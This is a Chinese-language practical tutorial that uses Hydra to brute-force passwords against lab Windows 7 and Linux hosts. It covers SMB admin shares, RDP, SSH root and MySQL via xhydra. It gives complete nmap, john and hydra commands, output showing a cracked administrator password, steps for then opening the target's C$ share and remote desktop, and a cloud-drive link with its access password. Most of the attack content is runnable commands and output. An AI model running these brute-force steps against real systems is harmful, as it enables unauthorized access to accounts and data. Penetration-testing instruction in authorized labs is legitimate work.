1.实战-使用hydra破解Win7文件共享密码
Hydra对应的英文意思是九头蛇,它是一款爆破神器,可以对多种服务的账号和密码进行爆破,包括Web 登录、数据库、SSH、FTP等服务,支持Linux、Windows、Mac平台安装,其中Kali Linux中自带Hydra。
在Windows系统当中,默认会启动一些文件共享,比如C$或ADMIN$(管理共享),而这些共享是使用smb协议,因此我可以针对smb协议进行破解。
注:开启文件共享
设置administrator用户登录密码。
运行cmd ,输入net user administrator *
回车后即可输入密码
Win7中开启文件共享之后在Kali中扫描445端口确保目标主机开启445端口:
# nmap 192.168.112.101 -p 445
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0c:29:xx:xx:xx(VMware)
通过john工具生成简单的密码字典(一般的弱口令都会包含进去)
# john --wordlist --rules --stdout > m.txt
破解smb文件共享密码:
# hydra -I administrator -P m.txt smb://192.168.112.101 -vV
[445][smb] host 192.168.112.101 login:administrator password:admin
hydra命令参数:
-l 指定单个用户名称
-L 指定用户名称字典
-p 指定单个密码
-P 指定密码字典
-s 指定端口
-vV 显示详细的执行过程
通过密码进行远程访问目标主机共享资源:
在物理机或其他Windows主机中打开运行窗口,开始菜单中点击运行,或者使用快捷键Win+R
\\192.168.112.101\C$
直接访问到目标主机C:盘
2.使用hydra破解Win7远程桌面密码
RDP,端口3389
运行sysdm.cpl打开高级系统设置:远程→允许运行任意版本远程桌面的计算机连接
# nmap 192.168.112.101 -p 3389
PORT STATE SERVICE
3389/tcp open ms-wbt-server
暴力破解远程桌面密码
# hydra -I administrator -P m.txt rdp://192.168.112.101 -vV
执行时出现报错。Kali2019.1a版本中自带的hydra工具的版本是8.8版本,在此版本中不支持RDP协议
解决:
升级hydra软件包版本
# apt install --only-upgrade hydra -y
# hydra -I administrator -P m.txt rdp://192.168.112.101 -vV
通过远程桌面进行连接:运行mstsc
3.使用hydra工具破解ssh服务root用户密码
# hydra -I root -P m.txt -t 4 ssh://192.168.112.101 -e nsr -vV
4.图形化暴力破解软件xhydra
要素:IP,端口号,用户名,字典,调整进程数加快速度
Target: Single Target: 192.168.112.100
Port: 3306
Protocol: mysql
Passwords: Username: root
Password List: /root/m.txt
Tuning: Number of Tasks: 4
Timeout: 30
No Proxy
Start
Hydra目前支持的破解服务有:
FTP,MSSQL,MYSQL,POP3,SSH等
Hydra官网:
百度网盘链接:
https://pan.baidu.com/s/1mi1OmhE
密码:atgg

